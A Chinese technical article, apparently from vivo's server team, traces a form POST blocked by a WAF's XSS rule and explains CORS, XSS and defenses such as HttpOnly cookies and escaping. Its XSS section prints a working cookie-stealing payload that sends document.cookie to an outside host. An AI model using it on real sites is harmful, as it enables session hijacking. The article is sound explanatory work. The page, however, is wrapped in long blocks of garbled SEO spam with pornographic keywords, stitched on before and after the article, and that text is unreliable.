精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

層層剖析一次 HTTP POST 請求事故

網絡 網絡管理
本文主要講述的是如何根據公司網絡架構和業(yè)務特點,鎖定正常請求被誤判為跨域的原因并解決。

作者 | vivo 互聯網服務器團隊- Wei Ling

本文主要講述的是如何根據公司網絡架構和業(yè)務特點,鎖定正常請求被誤判為跨域的原因并解決。

一、問題描述

某一個業(yè)務后臺在表單提交的時候,報跨域錯誤,具體如下圖:

從圖中可看出,報錯原因為HTTP請求發(fā)送失敗,由此,需先了解HTTP請求完整鏈路是什么。

HTTP請求一般經過3個關卡,分別為DNS、Nginx、Web服務器,具體流程如下圖:

  • 瀏覽器發(fā)送請求首先到達當地運營商DNS服務器,經過域名解析獲取請求 IP 地址
  • 瀏覽器獲取 IP 地址后,發(fā)送HTTP請求到達Nginx,由Nginx反向代理到Web服務端
  • 最后,由web服務端返回相應的資源

了解HTTP基本請求鏈路后,結合問題,進行初步調查,發(fā)現此form表單是application/json格式的post提交。同時,此業(yè)務系統采用了前后端分離的架構方式(頁面域名和后臺服務域名不同 ), 并且在Nginx已經配置跨域解決方案。基于此,我們進行分析。

二、問題排查步驟

第一步:自測定位

既然是form表單,我們采用控制變量法,嘗試對每一個字段進行修改后提交測試。在多次試驗后,鎖定表單中的moduleExport 字段的變化會導致這個問題。

考慮到moduleExport字段在業(yè)務上是一段JS代碼,我們嘗試對這段JS代碼進行刪除/修改,發(fā)現:當字段moduleExport中的這段js代碼足夠小的時候,問題消失。

基于上述發(fā)現,我們第一個猜想是:會不會是HTTP響應方的請求body大小限制導致了這個問題。

第二步:排查 HTTP 請求 body 限制

由于采用前后端分離,真實的請求是由 XXX.XXX.XXX 這個內網域名代表的服務進行響應的。而內網域名的響應鏈如下:

那么理論上,如果是HTTP請求body的限制,則可能發(fā)生在 LVS 層或者Nginx層或者Tomcat。我們一步步排查:

首先排查LVS層。若LVS層故障,則會出現網關異常的問題,返回碼會為502。故此,通過抓包查看返回碼,從下圖可看出,返回碼為418,故而排除LVS異常的可能

其次排查Nginx 層。Nginx層的HTTP配置如下:

我們看到,在Nginx層,最大支持的HTTP請求body為50m, 而我們這次事故的form請求表單,大約在2M, 遠小于限制, 所以:不是Nginx 層HTTP請求body的限制造成的。

然后排查 Tomcat 層,查看 Tomcat 配置:

我們發(fā)現, Tomcat 對于最大post請求的size限制是-1, 語義上表示為無限制,所以: 不是 Tomcat 層HTTP請求body的限制造成的。

綜上,我們可以認為:此次問題和HTTP請求body的大小限制無關。

那么問題來了,如果不是這兩層導致的,那么還會有別的因素或者別的網絡層導致的嗎?

第三步:集思廣益

我們把相關的運維方拉到了一個群里面進行討論,討論分兩個階段

【第一階段】

運維方同學發(fā)現 Tomcat 是使用容器進行部署的,而容器和nginx層中間,存在一個容器自帶的nameserver層——ingress。我們查看ingress的相關配置后,發(fā)現其對于HTTP請求body的大小限制為3072m。排除是ingress的原因。

【第二階段】

安全方同學表示,公司為了防止XSS攻擊,會對于所有后臺請求,都進行XSS攻擊的校驗,如果校驗不通過,會報跨域錯誤。

也就是說,理論上完整的網絡層調用鏈如下圖:

并且從WAF的工作機制和問題表象上來看,很有可能是WAF層的原因。

第四步:WAF 排查

帶著上述的猜測,我們重新抓包,嘗試獲取整個HTTP請求的optrace路徑,看看是不是在WAF層被攔截了,抓包結果如下:

從抓包數據上來看,status為complete代表前端請求發(fā)送成功,返回碼為418,而optrace中的ip地址經查詢?yōu)閃AF服務器ip地址。

綜上而言,form表單中的moduleExport字段的變化很可能導致在WAF層被攔截。而出現問題的moduleExport字段內容如下:

module.exports = {
"labelWidth": 80,
"schema": {
"title": "XXX",
"type": "array",
"items":{
"type":"object",
"required":["key","value"],
"properties":{
"conf":{
"title":"XXX",
"type":"string"
},
"configs":{
"title":"XXX",
"type":"array",
"items":{
......
config: {
......
validator: function(value, callback) {
// 至少填寫一項
if(!value || !Object.keys(value).length) {
return callback(new Error('至少填寫一項'))
}

callback()
}
}
......
}

我們進行一個字段一個字段排查后,鎖定

module.exports.items.properties.configs.config.validator字段會觸發(fā)WAF的攔截機制:請求包過WAF模塊時會對所有的攻擊規(guī)則都會進行匹配,若屬于高危風險規(guī)則,則觸發(fā)攔截動作。

三、 問題分析

整個故障的原因,是業(yè)務請求的內容觸發(fā)了WAF的XSS攻擊檢測。那么問題來了

  • 為什么需要WAF
  • 什么是XSS攻擊

在說明XSS之前,先得說清楚瀏覽器的跨域保護機制

3.1 跨域保護機制

現代瀏覽器都具備‘同源策略’,所謂同源策略,是指只有在地址的:

  • 協議名 HTTPS,HTTP
  • 域名
  • 端口名

均一樣的情況下,才允許訪問相同的cookie、localStorage或是發(fā)送Ajax請求等等。若在不同源的情況下訪問,就稱為跨域。而在日常開發(fā)中,存在合理的跨域需求,比如此次問題故障對應的系統,由于采用了前后端分離,導致頁面的域名和后臺的域名必然不相同。那么如何合理跨域便成了問題。

常見的跨域解決方案有:IFRAME, JSONP, CORS三種。

  • IFRAME 是在頁面內部生成一個IFRAME,并在IFRAME內部動態(tài)編寫JS進行提交。用到此技術的有早期的EXT框架等等。
  • JSONP 是將請求序列化成一個string,然后發(fā)起一個JS請求,帶上string。此做法需要后臺支持,并且只能使用GET請求。在當前的業(yè)內已經廢除此方案。
  • CORS 協議的應用比較廣泛,并且此次出事故的系統是采用了CORS進行前后端分離。那么,什么是CORS協議呢?

3.2 CORS協議

CORS(Cross-Origin Resource Sharing)跨源資源分享是解決瀏覽器跨域限制的W3C標準(官方文檔),其核心思路是:在HTTP的請求頭中設置相應的字段,瀏覽器在發(fā)現HTTP請求的相關字段被設置后,則會正常發(fā)起請求,后臺則通過對這些字段的校驗,決定此請求是否是合理的跨域請求。

CORS協議需要服務器的支持(非服務器的業(yè)務進程), 比如 Tomcat 7及其以后的版本等等。

對于開發(fā)者來說,CORS通信與同源的AJAX通信沒有差別,代碼完全一樣。瀏覽器一旦發(fā)現AJAX請求跨源,就會自動添加一些附加的頭信息,有時還會多出一次附加的請求,但用戶不會有感覺。

因此,實現CORS通信的關鍵是服務器(服務器端可判斷,讓哪些域可以請求)。只要服務器實現了CORS協議,就可以跨源通信。

雖然CORS解決了跨域問題,但引入了風險,如XSS攻擊,因此在到達服務器之前需加一層Web應用防火墻(WAF),它的作用是:過濾所有請求,當發(fā)現請求是跨域時,會對整個請求的報文進行規(guī)則匹配,如果發(fā)現規(guī)則不匹配,則直接報錯返回(類似于此次案例中的418)。

整體流程如下:

不合理的跨域請求,我們一般認為是侵略性請求,這一類的請求,我們視為XSS攻擊。那么廣義而言的XSS攻擊又是什么呢?

3.3 XSS 攻擊機制

XSS為跨站腳本攻擊(Cross-Site Scripting)的縮寫,可以將代碼注入到用戶瀏覽的網頁上,這種代碼包括 HTML 和 JavaScript。

例如有一個論壇網站,攻擊者可以在上面發(fā)布以下內容:

<script>location.href="http://domain.com/?c=" + document.cookiescript>

之后該內容可能會被渲染成以下形式:

<p><script>location.href="http://domain.com/?c=" + document.cookie</script></p>

另一個用戶瀏覽了含有這個內容的頁面將會跳轉到 domain.com 并攜帶了當前作用域的 Cookie。如果這個論壇網站通過 Cookie 管理用戶登錄狀態(tài),那么攻擊者就可以通過這個 Cookie 登錄被攻擊者的賬號了。

XSS通過偽造虛假的輸入表單騙取個人信息、顯示偽造的文章或者圖片等方式可竊取用戶的 Cookie,盜用Cookie后就可冒充用戶訪問各種系統,危害極大。

下面給出2種XSS防御機制。

3.4 XSS 防御機制

XSS防御機制主要包括以下兩點:

3.4.1 設置 Cookie 為 HTTPOnly

設置了 HTTPOnly 的 Cookie 可以防止 JavaScript 腳本調用,就無法通過 document.cookie 獲取用戶 Cookie 信息。

3.4.2 過濾特殊字符

例如將 < 轉義為&lt;,將> 轉義為&gt;,從而避免 HTML 和 Jascript 代碼的運行。

富文本編輯器允許用戶輸入 HTML 代碼,就不能簡單地將 < 等字符進行過濾了,極大地提高了 XSS 攻擊的可能性。

富文本編輯器通常采用 XSS filter 來防范 XSS 攻擊,通過定義一些標簽白名單或者黑名單,從而不允許有攻擊性的 HTML 代碼的輸入。

以下例子中,form 和 script 等標簽都被轉義,而 h 和 p 等標簽將會保留。

<h1 id="title">XSS Demo</h1>

<p>123</p>

<form>
<input type="text" name="q" value="test">
</form>

<pre>hello</pre>

<script type="text/javascript">
alert(/xss/);
</script>
<h1>XSS Demo</h1>

<p>123</p>

轉義后:

<h1>XSS Demo</h1>

<p>123</p>

&lt;form&gt;
&lt;input type="text" name="q" value="test"&gt;
&lt;/form&gt;

<pre>hello</pre>

&lt;script type="text/javascript"&gt;
alert(/xss/);
&lt;/script&gt;

四、問題解決

在確定問題后,讓安全團隊修改WAF的攔截規(guī)則后,問題消失。

最后,對此問題進行總結。

五、問題總結

縱覽整個排查過程,最耗費資源的工作集中于問題定位:到底是哪個模塊出現了問題。而定位模塊的最大難點在于:對于網絡全鏈路的不了解(之前并不知曉WAF層的存在)。

那么,針對類似的問題,我們后面應該如何去加速問題的解決呢?我認為有兩點需要注意:

  • 采用控制變量法, 精準定位到問題的邊界——什么時候能出現,什么時候不能出現。
  • 熟悉每一個模塊的存在,以及每一個模塊的職責邊界和風險可能。

下面來逐個解釋:

5.1 確定問題邊界

我們在一開始,確定是form表單導致的問題后,我們就逐個字段進行修改驗證,最終確定其中某個字段導致的現象。在定位到具體的問題發(fā)生地后,由將之前鎖定的字段進行拆解,逐步分析字段中每個屬性,從而最終確定XX屬性的值觸犯了WAF的規(guī)則機制。

5.2 定位模塊錯誤

在此案例中,跨域拒絕的故障主要是網絡層,那么我們就必須要摸清楚整個業(yè)務服務的網絡層次結構。然后對每一層的情況進行分析。

  • 在Nginx層,我們對配置文件進行分析
  • 在ingress層,我們對其中的配置規(guī)則進行分析
  • 在Tomcat層,我們對server.xml的屬性進行分析

總結而言,我們必須熟悉每一個模塊的職責,并且知曉如何判斷每一個模塊是否在整個鏈路中正常工作,只有基于此,我們才能將問題原因的范圍逐步縮小,從而最后獲得答案。

責任編輯:未麗燕 來源: vivo互聯網技術
相關推薦

2020-08-24 07:34:39

網絡超時請求

2025-03-11 08:48:35

JVMOOM事故

2025-02-24 12:00:00

開發(fā)SpringBootJava

2021-03-05 22:41:55

CDH集群CDH集群

2021-04-13 08:54:28

dubbo線程池事故排查

2019-01-16 09:20:42

架構設計JVM FullGC宕機事故

2022-07-11 13:58:14

數據庫業(yè)務流程系統

2020-11-16 12:35:25

線程池Java代碼

2023-01-16 14:49:00

MongoDB數據庫

2022-06-06 11:31:31

MySQL數據查詢

2022-07-12 17:03:43

鴻蒙網絡請求庫

2017-11-09 09:06:29

流量暴增優(yōu)化

2022-11-16 08:00:00

雪花算法原理

2020-09-25 07:57:42

生產事故系統

2022-09-07 09:09:13

高并發(fā)架構

2020-10-21 12:10:30

訂單號Java代碼

2023-07-28 14:32:33

QtPOST請求

2022-10-25 18:00:00

Redis事務生產事故

2022-10-10 17:52:08

CPUERP系統

2018-11-14 15:00:08

HTTP程序員前端
點贊
收藏

51CTO技術棧公眾號

中文字幕二区三区| 男生裸体视频网站| 欧美24videosex性欧美| av亚洲精华国产精华| 欧日韩在线观看| 91成人精品一区二区| 懂色av色香蕉一区二区蜜桃| 亚洲国产欧美在线| 日韩精品一区二区三区四区五区| 91久久国语露脸精品国产高跟| 狠狠噜噜久久| 亚洲最新av网址| 欧美xxxx黑人| 日本精品在线一区| 亚洲在线视频网站| 天天综合色天天综合色hd| 狠狠综合久久av一区二区| 中文字幕一区二区三区手机版 | a级精品国产片在线观看| 国产在线三区| 午夜两性免费视频| 久久av在线看| 欧美性猛交xxxx黑人| 55夜色66夜色国产精品视频| sm捆绑调教视频| 国产一区在线电影| 欧美一级日韩不卡播放免费| 国产精品亚洲αv天堂无码| 尤物视频在线看| 中文字幕巨乱亚洲| 欧美另类高清视频在线| 亚洲乱码国产乱码精品精软件| 爽好多水快深点欧美视频| 欧美精品激情在线| 久久r这里只有精品| 日韩在线看片| 国产亚洲精品日韩| 国产精品无码久久久久一区二区| 日韩精品成人| 欧美精品少妇一区二区三区| 欧美综合在线观看视频| 樱桃视频成人在线观看| 亚欧色一区w666天堂| 99热这里只有精品免费| 最新av在线播放| 亚洲视频一区在线观看| 婷婷四房综合激情五月| 免费动漫网站在线观看| 久久综合九色综合97_久久久| 国产三区二区一区久久| 国产 欧美 自拍| 国产999精品久久久久久绿帽| 亚洲a成v人在线观看| 国产精品久久久国产盗摄| 毛片av一区二区| 国产精品视频精品| 怡红院男人天堂| 人人精品人人爱| 国产精品小说在线| 亚洲天堂视频网| 九九热在线视频观看这里只有精品| 国产欧美精品一区二区| 中文字幕在线2018| 精品一区二区国语对白| 91精品久久久久久久久中文字幕| 一区二区三区播放| 国产一区二区0| 97视频资源在线观看| 成人黄色免费视频| 成人自拍视频在线| 美女一区视频| 国产理论电影在线观看| 欧美国产日韩一二三区| 中文字幕中文字幕在线中一区高清| 秋霞成人影院| 亚洲激情男女视频| 日韩人妻无码精品久久久不卡| 97人澡人人添人人爽欧美| 黑人极品videos精品欧美裸| 日日碰狠狠躁久久躁婷婷| 欧美日韩视频免费观看| 欧美日韩视频专区在线播放| 视频免费1区二区三区| 一区中文字幕电影| 亚洲欧美www| 手机av在线不卡| 欧美a级片网站| 青青草原成人在线视频| 亚洲无码久久久久| 懂色av一区二区三区免费看| 欧美高清一区二区| 在线激情网站| 午夜欧美在线一二页| 国产性生交xxxxx免费| 91精品一久久香蕉国产线看观看| 欧美videofree性高清杂交| 三上悠亚ssⅰn939无码播放 | 日韩免费电影一区| 久久久久久久无码| 天天综合网91| 性欧美xxxx交| 中文字幕人妻丝袜乱一区三区| 国产呦萝稀缺另类资源| 欧美精品欧美精品| 91麻豆免费在线视频| 欧美日韩中文在线观看| 一级黄色在线播放| 美女网站一区| 欧美激情精品久久久久久| 天天综合久久综合| 成人丝袜高跟foot| 特级毛片在线免费观看| 咪咪网在线视频| 欧美一级国产精品| 精品无人区无码乱码毛片国产| 欧美aa国产视频| 国产精品美女久久久久久免费| 成人av一区二区三区在线观看| 亚洲国产精品99久久久久久久久 | 日本免费在线视频不卡一不卡二| 成人免费视频观看视频| 天天综合视频在线观看| 欧美日韩裸体免费视频| 国产精品成人免费一区久久羞羞| 欧美系列电影免费观看| 97视频在线观看免费| 国产激情无套内精对白视频| 国产精品色噜噜| 国产真实乱子伦| 国产伦精品一区二区三区免费优势| 日韩在线中文字| 波多野结衣一区二区三区在线| 成人美女视频在线看| 日韩亚洲欧美一区二区| 一区在线不卡| 中文字幕免费国产精品| 加勒比在线一区| 2021中文字幕一区亚洲| 日本十八禁视频无遮挡| 成人搞黄视频| 久久久久久久久久亚洲| 亚洲成人黄色片| 有码一区二区三区| 日本wwww色| 国模一区二区三区| wwwxx欧美| 女同一区二区免费aⅴ| 日韩一级黄色片| 男人的天堂久久久| 国产精品一区2区| 日韩不卡视频一区二区| 亚洲啊v在线免费视频| 久久91亚洲人成电影网站| www黄色网址| 亚洲大片精品永久免费| jlzzjizz在线播放观看| 亚洲综合好骚| 日本一区二区精品视频| 日本精品网站| 日韩在线播放av| 国产av无码专区亚洲av| 亚洲精品菠萝久久久久久久| 亚洲天堂小视频| 亚洲小说欧美另类社区| 精品国产_亚洲人成在线| 另类图片综合电影| 一色桃子一区二区| 国产丝袜视频在线观看| 一区二区三区在线视频播放| 日本wwwwwww| 亚洲一区自拍| 亚洲国产欧美日韩| 精品国产第一国产综合精品| 欧美夫妻性生活xx| 爽爽视频在线观看| 欧美色偷偷大香| 国产va在线播放| 91毛片在线观看| 在线观看国产中文字幕| 欧美成人69| 精品无人乱码一区二区三区的优势 | 尤物tv在线精品| 国产欧美一区二区| 性欧美ⅴideo另类hd| 亚洲精品国产精品乱码不99按摩| 成人毛片一区二区三区| 亚洲色图20p| 久久人人妻人人人人妻性色av| 久久永久免费| 91九色国产ts另类人妖| 精品资源在线| 国产原创欧美精品| 九色porny自拍视频在线播放| 亚洲四色影视在线观看| 亚洲爆乳无码一区二区三区| 欧美性猛交xxxx免费看久久久| 黄色激情小视频| 99久久久精品免费观看国产蜜| 一区二区三区视频在线观看免费| 欧美三级乱码| 色播亚洲婷婷| 国产精品tv| 国产日韩中文在线| 在线观看的黄色| 欧美日韩aaaa| 第一页在线观看| 亚洲精品成人久久电影| 国产三级精品在线观看| 色老头久久综合| av资源吧首页| 18欧美亚洲精品| 国产精成人品免费观看| 不卡av在线免费观看| 欧美激情国内自拍| 日韩国产欧美一区二区三区| 可以看毛片的网址| 亚洲国产精品久久久久蝴蝶传媒| 免费试看一区| 9国产精品午夜| 亚洲自拍偷拍区| 青青热久免费精品视频在线18| 国模吧一区二区| 99热国产在线中文| 精品国产一区二区三区久久狼黑人| 欧美日韩免费做爰大片| 亚洲国产精品视频在线观看| 国产三级在线观看视频| 欧美图区在线视频| 国产熟妇一区二区三区四区| 性感美女久久精品| 国产大片aaa| 一区二区三区精品| 久久国产波多野结衣| 中国av一区二区三区| 亚洲精品国产精品国自产网站| av不卡免费电影| 扒开伸进免费视频| 成人午夜激情片| 精品伦一区二区三区| 国产成a人无v码亚洲福利| 99999精品| 国产精品系列在线播放| 天天影视色综合| 美女网站一区二区| 91福利国产成人精品播放| 天堂成人国产精品一区| 黄色动漫在线免费看| 国产精品毛片在线| 欧美色图色综合| 午夜综合激情| 黄色片久久久久| 久久视频一区| 人人爽人人av| 久久99热狠狠色一区二区| 一起操在线视频| 国产一区二区三区国产| 日韩精品视频网址| 懂色av一区二区三区免费观看| 麻豆tv在线观看| 成人午夜视频在线观看| 中国一级特黄录像播放| av电影在线观看不卡| 色婷婷av777| 国产蜜臀97一区二区三区| 一本色道久久88| 亚洲女与黑人做爰| 国产亚洲成人精品| 精品久久久中文| 无码人妻精品一区二区三区9厂| 色噜噜狠狠成人网p站| 亚洲在线免费观看视频| 日韩天堂在线观看| 天天摸天天碰天天爽天天弄| 亚洲欧美日韩国产精品| 91av资源在线| 欧美激情在线播放| 户外露出一区二区三区| 国产主播欧美精品| 大伊香蕉精品在线品播放| 久久精品二区| 999国产精品视频| 99久久免费观看| 久久精品电影| 亚洲精品视频三区| 99久久777色| 精品在线观看一区| 亚洲一区二区欧美日韩| 亚洲欧美偷拍视频| 7777精品伊人久久久大香线蕉经典版下载 | 最新日本在线观看| 55夜色66夜色国产精品视频| 欧美jizz18| 久久久久久高清| 911精品美国片911久久久| 国产高清av在线播放| 青青青伊人色综合久久| 在线播放av网址| 日本一区免费视频| 国产一级片免费观看| 欧美最猛黑人xxxxx猛交| 丰满少妇在线观看bd| 尤物九九久久国产精品的特点| japanese色国产在线看视频| 国产精品久久久久久久9999| 国产极品模特精品一二| 在线观看欧美激情| 嫩草成人www欧美| 1314成人网| 日本一区二区视频在线观看| 国产一级久久久| 欧美日韩国产精品成人| 网站黄在线观看| 久久艳片www.17c.com | 欧美色手机在线观看| 深爱五月激情五月| 久久夜色精品国产欧美乱| 老司机2019福利精品视频导航| 99热在线国产| 99九九热只有国产精品| 久久精品免费一区二区| 福利一区福利二区| 精品国产欧美日韩不卡在线观看| 91极品视觉盛宴| 亚洲欧洲视频在线观看| 欧美激情在线视频二区| 久久久久久爱| 中文字幕一区二区三区乱码| 日韩精品一卡二卡三卡四卡无卡 | 国产精品视频线看| 国产午夜麻豆影院在线观看| 亚洲成色777777在线观看影院| 黄色av免费在线| 成人国产精品色哟哟| 久久理论电影| 国产高潮免费视频| 国产肉丝袜一区二区| 成人公开免费视频| 亚洲欧美精品中文字幕在线| 理论片午夜视频在线观看| 国产亚洲欧美另类一区二区三区| 欧美一区二区三区免费看| 在线观看av免费观看| 综合久久久久久久| 国产精品欧美亚洲| 日韩亚洲欧美中文高清在线| 欧美在线se| 一区二区在线高清视频| 久久精品99久久久| 成人午夜免费影院| 欧美日韩国产大片| 米奇精品一区二区三区| 国产一区私人高清影院| 99精品在线观看| 美女日批在线观看| 亚洲综合激情网| 女人18毛片水真多18精品| 97国产在线视频| 牲欧美videos精品| 国产又大又黄又粗的视频| 日本一二三不卡| 国产乱淫a∨片免费观看| 美女av一区二区| 懂色av一区二区| 欧美在线观看成人| 欧美激情中文字幕| 国产精品一区二区av白丝下载| 美女啪啪无遮挡免费久久网站| eeuss国产一区二区三区四区| 国产综合av在线| 国产日韩欧美精品在线| 91theporn国产在线观看| 久久亚洲精品成人| 加勒比久久高清| 欧美精品无码一区二区三区| 国产精品的网站| 亚洲女人18毛片水真多| 国产成人aa精品一区在线播放| 大片网站久久| 95视频在线观看| 一本色道久久综合亚洲aⅴ蜜桃| аⅴ资源新版在线天堂| 99re国产视频| 天堂影院一区二区| 日日噜噜夜夜狠狠久久波多野| 精品免费99久久| 欧美亚洲大片| 超碰10000| 国产婷婷色一区二区三区四区| 国产精品乱码久久久| 海角国产乱辈乱精品视频| 欧美日韩国产一区二区三区不卡 | 精品国产一区二区三区不卡蜜臂| 久草在在线视频| 亚洲一区二区四区蜜桃| 高清福利在线观看| 国产精品久久波多野结衣| 美女mm1313爽爽久久久蜜臀| 久草视频手机在线观看| 神马久久久久久| 日本亚洲不卡|